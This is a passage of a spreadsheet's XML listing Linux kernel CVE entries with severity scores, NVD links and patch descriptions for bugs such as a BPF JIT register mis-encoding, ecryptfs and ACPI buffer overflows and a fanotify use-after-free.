releases its recursion slot via put_callchain_entry() before returning,
so nothing keeps the entry reserved while __bpf_get_stack() consumes
it below.
A preemptible BPF program (e.g. a non-sleepable raw tracepoint program
on a PREEMPT kernel, which runs under migrate_disable() but not
preempt_disable()) can be scheduled out between obtaining the entry
and the copy. Another task scheduled on the same CPU then reuses the
same per-CPU buffer and overwrites trace-&gt;nr with a larger value.
copy_len is then computed from the inflated trace-&gt;nr and can exceed
the caller's buffer, causing an out-of-bounds write in the memcpy()
and in the build_id path.
The rcu_read_lock() taken here alone does not prevent this. It is
only taken on the may_fault path, and under CONFIG_PREEMPT_RCU it does
not disable preemption; it merely keeps perf's callchain buffer array
alive (freed via call_rcu()) and does nothing to stop another task
from reusing the entry.
Disable preemption around obtaining the callchain entry and copying
it into the caller's buffer, so the entry cannot be reused underneath
us and trace-&gt;nr stays bounded by max_depth. Build ID resolution may
fault and is therefore deferred until after preemption is re-enabled;
by then the instruction pointers have already been copied into buf,
so it operates only on that private copy. Note, preempt_disable() also
subsumes the buffer-lifetime guarantee the rcu_read_lock() provided,
since a preempt-disabled section is an RCU read-side critical section
for the callchain buffers' call_rcu() reclaim.
[ changed Fixes: commit ]</t>
        </is>
      </c>
      <c r="S383" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89580</t>
        </is>
      </c>
    </row>
    <row r="384">
      <c r="A384" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B384" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C384" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89581</t>
        </is>
      </c>
      <c r="D384" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E384" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F384" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G384" s="5" t="inlineStr"/>
      <c r="H384" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I384" s="5" t="inlineStr"/>
      <c r="J384" s="5" t="inlineStr"/>
      <c r="K384" s="5" t="inlineStr"/>
      <c r="L384" s="5" t="inlineStr"/>
      <c r="M384" s="5" t="inlineStr"/>
      <c r="N384" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O384" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P384" s="5" t="inlineStr"/>
      <c r="Q384" s="5" t="inlineStr"/>
      <c r="R384" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf, x86: Fix per-CPU address resolution into an extended register
The destination of the per-CPU address MOV is encoded in ModRM.reg,
which is extended by REX.R, but the REX prefix is built with
add_1mod(), which sets REX.B. REX.B extends ModRM.rm and SIB.base, and
this instruction addresses memory as disp32 with no base, so the bit
has no effect at all and the high register bit is simply lost.
Every is_ereg() destination therefore resolves to the wrong register,
picking whichever one shares the low three bits:
  R5 -&gt; RAX    R7 -&gt; RBP    R8 -&gt; RSI    R9 -&gt; RDI
With BPF_REG_5, whose reg2hex is 0, the emitted
  65 49 03 04 25 &lt;off&gt;	add %gs:&lt;off&gt;,%rax
adds the per-CPU offset to RAX rather than R8. The destination keeps
the unadjusted address and RAX is clobbered, so the program goes on to
dereference a pointer that was never made per-CPU:
  BUG: unable to handle page fault for address: 0000607e386a8894
  RIP: bpf_prog_707837aafd2aa9ae_update_percpu_data+0x93/0xc9
  Call Trace:
   __bpf_prog_test_run_raw_tp+0x2dc/0x7d0
   __flush_smp_call_function_queue+0x1e9/0xc80
  Kernel panic - not syncing: Fatal exception in interrupt
R5 is the mildest of the four, aliasing a scratch register and faulting
at the store. R7 aliases RBP and would corrupt the frame pointer, R8
and R9 alias the argument registers.
Use add_2mod() so the register goes through REX.R, matching how
add_2reg() places it in ModRM.reg and how emit_priv_frame_ptr()
hardcodes 0x4c for the same instruction with R9. Encodings for the
non-extended registers are unchanged.
Problem showed up when trying to resurrect BPF_GCC CI (selftests built
with BPF_GCC).
This has gone unnoticed because clang reloads the address into R1
before each per-CPU access, so the destination is never an extended
register. GCC keeps several per-CPU addresses live at once, and
test_progs-bpf_gcc panics the kernel in global_percpu_data/init, where
the address of a .percpu variable ends up in R5.</t>
        </is>
      </c>
      <c r="S384" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89581</t>
        </is>
      </c>
    </row>
    <row r="385">
      <c r="A385" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B385" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C385" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89584</t>
        </is>
      </c>
      <c r="D385" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E385" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F385" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G385" s="5" t="inlineStr"/>
      <c r="H385" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I385" s="5" t="inlineStr"/>
      <c r="J385" s="5" t="inlineStr"/>
      <c r="K385" s="5" t="inlineStr"/>
      <c r="L385" s="5" t="inlineStr"/>
      <c r="M385" s="5" t="inlineStr"/>
      <c r="N385" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O385" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P385" s="5" t="inlineStr"/>
      <c r="Q385" s="5" t="inlineStr"/>
      <c r="R385" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
block: validate user space vectors during extraction
The bio-based drivers don't necessarily check the alignment split, and
stacking block drivers don't always handle a misalignment detected after
submitting the bio. Validate user vectors against the device's
dma_alignment as the bio is built from the iov_iter, rejecting
misaligned early with -EINVAL.</t>
        </is>
      </c>
      <c r="S385" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89584</t>
        </is>
      </c>
    </row>
    <row r="386">
      <c r="A386" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B386" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C386" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89585</t>
        </is>
      </c>
      <c r="D386" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E386" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F386" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G386" s="5" t="inlineStr"/>
      <c r="H386" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I386" s="5" t="inlineStr"/>
      <c r="J386" s="5" t="inlineStr"/>
      <c r="K386" s="5" t="inlineStr"/>
      <c r="L386" s="5" t="inlineStr"/>
      <c r="M386" s="5" t="inlineStr"/>
      <c r="N386" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O386" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P386" s="5" t="inlineStr"/>
      <c r="Q386" s="5" t="inlineStr"/>
      <c r="R386" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
auxdisplay: charlcd: cancel backlight work on registration failure
With CONFIG_CHARLCD_BL_FLASH, charlcd_init() schedules bl_work before
charlcd_register() calls misc_register(). If registration fails, the
caller frees the charlcd object while delayed work still contains its
address.
Add charlcd_deinit() to cancel the delayed work and turn the backlight
off. Use it for both registration rollback and normal unregistration.</t>
        </is>
      </c>
      <c r="S386" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89585</t>
        </is>
      </c>
    </row>
    <row r="387">
      <c r="A387" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B387" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C387" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89587</t>
        </is>
      </c>
      <c r="D387" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E387" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F387" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G387" s="5" t="inlineStr"/>
      <c r="H387" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I387" s="5" t="inlineStr"/>
      <c r="J387" s="5" t="inlineStr"/>
      <c r="K387" s="5" t="inlineStr"/>
      <c r="L387" s="5" t="inlineStr"/>
      <c r="M387" s="5" t="inlineStr"/>
      <c r="N387" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O387" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P387" s="5" t="inlineStr"/>
      <c r="Q387" s="5" t="inlineStr"/>
      <c r="R387" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ACPI: pfr_update: fix stack buffer overflow in query_capability()
query_capability() copies four ACPI buffer objects returned by the
firmware _DSM into fixed-size u8[16] fields in struct
pfru_update_cap_info using memcpy with the firmware-supplied length:
  memcpy(&amp;cap_hdr-&gt;code_type,
         elements[CAP_CODE_TYPE_IDX].buffer.pointer,
         elements[CAP_CODE_TYPE_IDX].buffer.length);
The same pattern repeats for drv_type, platform_id, and oem_id.
If the firmware returns buffer.length &gt; 16 for any of these fields,
memcpy writes past the destination array.
struct pfru_update_cap_info is stack-allocated in pfru_ioctl().
Confirmed with KASAN on 7.2-rc6: three stack-out-of-bounds reports
are generated when a DSM returns 64-byte buffers, with writes reaching
44 bytes past the end of cap_hdr's [64, 156) frame window into
adjacent stack redzones.
Introduce a helper pointer to out_obj-&gt;package.elements and use it
to validate each buffer length against its destination field size
before copying, returning -EINVAL if the firmware supplies an
oversized buffer.</t>
        </is>
      </c>
      <c r="S387" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89587</t>
        </is>
      </c>
    </row>
    <row r="388">
      <c r="A388" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B388" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C388" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89594</t>
        </is>
      </c>
      <c r="D388" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E388" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F388" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G388" s="5" t="inlineStr"/>
      <c r="H388" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I388" s="5" t="inlineStr"/>
      <c r="J388" s="5" t="inlineStr"/>
      <c r="K388" s="5" t="inlineStr"/>
      <c r="L388" s="5" t="inlineStr"/>
      <c r="M388" s="5" t="inlineStr"/>
      <c r="N388" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O388" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P388" s="5" t="inlineStr"/>
      <c r="Q388" s="5" t="inlineStr"/>
      <c r="R388" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
hsi: omap_ssi_core: fix missing DMA mask setup for SSI controller device
The OMAP SSI driver uses a synthetic HSI controller device allocated via
hsi_alloc_controller(), which does not go through the normal OF/platform
device initialization path.
As a result, the embedded struct device does not have a DMA mask
initialized by default.
After recent DMA API hardening changes, dma_map_sg() and related helpers
now require a valid dma_mask to be present, otherwise the driver may
crash or trigger warnings when attempting DMA mapping operations.
Fix this by explicitly initializing the DMA mask for the SSI controller
device and setting a 32-bit DMA mask, which matches the hardware
capabilities.</t>
        </is>
      </c>
      <c r="S388" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89594</t>
        </is>
      </c>
    </row>
    <row r="389">
      <c r="A389" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B389" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C389" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89597</t>
        </is>
      </c>
      <c r="D389" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E389" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F389" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G389" s="5" t="inlineStr"/>
      <c r="H389" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I389" s="5" t="inlineStr"/>
      <c r="J389" s="5" t="inlineStr"/>
      <c r="K389" s="5" t="inlineStr"/>
      <c r="L389" s="5" t="inlineStr"/>
      <c r="M389" s="5" t="inlineStr"/>
      <c r="N389" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O389" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P389" s="5" t="inlineStr"/>
      <c r="Q389" s="5" t="inlineStr"/>
      <c r="R389" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
fbdev: uvesafb: unregister connector callback on init failure
uvesafb_init() registers the v86d connector callback before registering
the platform driver. If platform_driver_register() fails, the function
returns the error directly and leaves the connector callback registered.
The later platform-device failure path already unregisters the callback.
Add the same cleanup before the final return when platform-driver
registration fails.
This issue was identified during our ongoing static-analysis research while
reviewing kernel code.</t>
        </is>
      </c>
      <c r="S389" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89597</t>
        </is>
      </c>
    </row>
    <row r="390">
      <c r="A390" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B390" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C390" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89600</t>
        </is>
      </c>
      <c r="D390" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E390" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F390" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G390" s="5" t="inlineStr"/>
      <c r="H390" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I390" s="5" t="inlineStr"/>
      <c r="J390" s="5" t="inlineStr"/>
      <c r="K390" s="5" t="inlineStr"/>
      <c r="L390" s="5" t="inlineStr"/>
      <c r="M390" s="5" t="inlineStr"/>
      <c r="N390" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O390" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P390" s="5" t="inlineStr"/>
      <c r="Q390" s="5" t="inlineStr"/>
      <c r="R390" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
fanotify: fix use-after-free of file range info
fsnotify_pre_content() builds its file_range on the triggering task's
stack. fanotify_alloc_perm_event() saves a pointer to range.pos in the
heap-allocated permission event so copy_range_info_to_user() can report
the offset later.
The event reader can set the event state to FAN_EVENT_REPORTED and then
sleep while preparing the file descriptor. If a signal interrupts the
triggering task at that point, fanotify_get_response() changes the state
to FAN_EVENT_CANCELED and returns. This unwinds the file_range stack
frame while the reader still owns the event. The reader then dereferences
pevent-&gt;ppos and copies the stale stack value to userspace.
KASAN reported:
  BUG: KASAN: use-after-free in fanotify_read+0x293e/0x2970
  Read of size 8 at addr ffff88811434fc50 by task fanotify_inotif/95
  Call Trace:
   fanotify_read+0x293e/0x2970
   vfs_read+0x177/0xa20
   ksys_read+0xf7/0x1c0
   do_syscall_64+0xf9/0x540
   entry_SYSCALL_64_after_hwframe+0x77/0x7f
Store the range position directly in the permission event and use
FANOTIFY_NO_RANGE when range information is unavailable. The event remains
alive until the reader finishes, so the reported offset no longer depends
on the triggering task's stack.</t>
        </is>
      </c>
      <c r="S390" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89600</t>
        </is>
      </c>
    </row>
    <row r="391">
      <c r="A391" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B391" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C391" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89602</t>
        </is>
      </c>
      <c r="D391" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E391" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F391" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G391" s="5" t="inlineStr"/>
      <c r="H391" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I391" s="5" t="inlineStr"/>
      <c r="J391" s="5" t="inlineStr"/>
      <c r="K391" s="5" t="inlineStr"/>
      <c r="L391" s="5" t="inlineStr"/>
      <c r="M391" s="5" t="inlineStr"/>
      <c r="N391" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O391" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P391" s="5" t="inlineStr"/>
      <c r="Q391" s="5" t="inlineStr"/>
      <c r="R391" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
erofs: skip sufficiently large global buffers when resizing
z_erofs_gbuf_nrpages is advanced only after every global buffer has been
grown. If a resize fails after some buffers were enlarged, a retry
revisits those enlarged buffers.
Retrying the same size then returns -ENOMEM because alloc_pages_bulk()
has no pages to add and the unchanged return value is treated as a
failure. Retrying an intermediate size allocates a temporary pointer
array smaller than gbuf-&gt;nrpages and copies more existing pointers than
the array can hold.
Skip buffers that already satisfy the request. Once all remaining
buffers have caught up, advancing z_erofs_gbuf_nrpages again describes
the guaranteed minimum size across the pool.</t>
        </is>
      </c>
      <c r="S391" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89602</t>
        </is>
      </c>
    </row>
    <row r="392">
      <c r="A392" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B392" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C392" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89605</t>
        </is>
      </c>
      <c r="D392" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E392" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F392" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G392" s="5" t="inlineStr"/>
      <c r="H392" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I392" s="5" t="inlineStr"/>
      <c r="J392" s="5" t="inlineStr"/>
      <c r="K392" s="5" t="inlineStr"/>
      <c r="L392" s="5" t="inlineStr"/>
      <c r="M392" s="5" t="inlineStr"/>
      <c r="N392" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O392" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P392" s="5" t="inlineStr"/>
      <c r="Q392" s="5" t="inlineStr"/>
      <c r="R392" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ecryptfs: release message context on send failure
ecryptfs_send_message_locked() moves a message context from the free
list to the allocated list before sending the request to the userspace
daemon.
If ecryptfs_send_miscdev() fails, the context is left on the
allocated list and cannot be reused. Move it back to the free list on
failure and clear the caller's pointer.</t>
        </is>
      </c>
      <c r="S392" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89605</t>
        </is>
      </c>
    </row>
    <row r="393">
      <c r="A393" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B393" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C393" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89606</t>
        </is>
      </c>
      <c r="D393" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E393" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F393" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G393" s="5" t="inlineStr"/>
      <c r="H393" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I393" s="5" t="inlineStr"/>
      <c r="J393" s="5" t="inlineStr"/>
      <c r="K393" s="5" t="inlineStr"/>
      <c r="L393" s="5" t="inlineStr"/>
      <c r="M393" s="5" t="inlineStr"/>
      <c r="N393" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O393" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P393" s="5" t="inlineStr"/>
      <c r="Q393" s="5" t="inlineStr"/>
      <c r="R393" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ecryptfs: reject too-small tag 70 packets
ecryptfs_parse_tag_70_packet() subtracts fixed metadata fields from the
parsed packet body size to derive the encrypted filename size.  A
malformed packet with a body smaller than those fixed fields can underflow
that size calculation.
Reject tag 70 packets before the subtraction unless the body contains the
signature, cipher code, and at least one byte of encrypted filename data.</t>
        </is>
      </c>
      <c r="S393" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89606</t>
        </is>
      </c>
    </row>
    <row r="394">
      <c r="A394" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B394" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C394" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89607</t>
        </is>
      </c>
      <c r="D394" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E394" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F394" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G394" s="5" t="inlineStr"/>
      <c r="H394" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I394" s="5" t="inlineStr"/>
      <c r="J394" s="5" t="inlineStr"/>
      <c r="K394" s="5" t="inlineStr"/>
      <c r="L394" s="5" t="inlineStr"/>
      <c r="M394" s="5" t="inlineStr"/>
      <c r="N394" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O394" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P394" s="5" t="inlineStr"/>
      <c r="Q394" s="5" t="inlineStr"/>
      <c r="R394" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ecryptfs: reject oversized encrypted_key_size in parse_tag_3_packet
parse_tag_3_packet() set encrypted_key_size from the Tag 3 packet body
without bounding it against ECRYPTFS_MAX_KEY_BYTES (64). When
encrypted_key_size &gt; 64, decrypt_passphrase_encrypted_session_key()
sets decrypted_key_size = encrypted_key_size and performs two
out-of-bounds writes:
1. crypto_skcipher_decrypt() writes encrypted_key_size bytes into
   decrypted_key[64] via scatterlist, overflowing into the parent
   ecryptfs_auth_tok struct.
2. memcpy(crypt_stat-&gt;key, decrypted_key, decrypted_key_size) writes
   into crypt_stat-&gt;key[64], corrupting root_iv, keysig_list, and
   mutexes in ecryptfs_crypt_stat.
Only AES-192 (cipher code 0x08) enables this because it sets
crypt_stat-&gt;key_size = 24 independently of encrypted_key_size,
allowing crypto_skcipher_setkey() to succeed while encrypted_key_size
exceeds ECRYPTFS_MAX_KEY_BYTES.
The PKI decryption path (parse_tag_65_packet) already validates
decrypted_key_size &lt;= ECRYPTFS_MAX_KEY_BYTES; the passphrase path
omits this check.
Bound encrypted_key_size against ECRYPTFS_MAX_KEY_BYTES (64) rather
than ECRYPTFS_MAX_ENCRYPTED_KEY_BYTES (512). The 64-byte limit also
protects the 512-byte encrypted_key[] buffer, so the former 512-byte
check is removed as redundant.
[tyhicks: Adjust the code comment to refer to macros representing the
 buffer sizes rather than mentioning the buffer size values since they
 may change in the future]</t>
        </is>
      </c>
      <c r="S394" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89607</t>
        </is>
      </c>
    </row>
    <row r="395">
      <c r="A395" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B395" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C395" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89609</t>
        </is>
      </c>
      <c r="D395" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E395" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F395" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G395" s="5" t="inlineStr"/>
      <c r="H395" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I395" s="5" t="inlineStr"/>
      <c r="J395" s="5" t="inlineStr"/>
      <c r="K395" s="5" t="inlineStr"/>
      <c r="L395" s="5" t="inlineStr"/>
      <c r="M395" s="5" t="inlineStr"/>
      <c r="N395" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O395" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P395" s="5" t="inlineStr"/>
      <c r="Q395" s="5" t="inlineStr"/>
      <c r="R395" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ecryptfs: hold msg ctx list lock when cleaning daemon queue
ecryptfs_exorcise_daemon() drops queued messages from a dying daemon
without holding ecryptfs_msg_ctx_lists_mux, but
ecryptfs_msg_ctx_alloc_to_free() requires that lock.
Take the list lock while moving the queued contexts back to the free
list to avoid racing with other global msg ctx list users.</t>
        </is>
      </c>
      <c r="S395" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89609</t>
        </is>
      </c>
    </row>
    <row r="396">
      <c r="A396" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B396" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C396" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89617</t>
        </is>
      </c>
      <c r="D396" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E396" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F396" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G396" s="5" t="inlineStr"/>
      <c r="H396" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I396" s="5" t="inlineStr"/>
      <c r="J396" s="5" t="inlineStr"/>
      <c r="K396" s="5" t="inlineStr"/>
      <c r="L396" s="5" t="inlineStr"/>
      <c r="M396" s="5" t="inlineStr"/>
      <c r="N396" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O396" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P396" s="5" t="inlineStr"/>
      <c r="Q396" s="5" t="inlineStr"/>
      <c r="R396" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
fs/ntfs3: validate dirty page table on log replay
Each DIR_PAGE_ENTRY ends in a page_lcns[] array whose length is the on-disk
lcns_follow field. check_rstbl() validates the table bookkeeping but never
checks that this array fits in the entry, so a crafted lcns_follow lets the
v0-&gt;v1 conversion memmove and later replay passes run off the entry.
Add check_dp_table() to reject, right after check_rstbl(), any entry larger
than its size claims via struct_size() (the same expression used to allocate
these entries, so the check is overflow-safe by construction). All consumers
can then trust lcns_follow as the real capacity. This covers every
page_lcns[] access whose index is bounded by the entry itself (the
conversion memmove, the HotFix store via find_dp(), and the self-bounded
scan loops). Accesses whose index comes from the log record need a separate
bound and are handled in a follow-up patch.</t>
        </is>
      </c>
      <c r="S396" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89617</t>
        </is>
      </c>
    </row>
    <row r="397">
      <c r="A397" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B397" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C397" s="5" t="inlineStr">
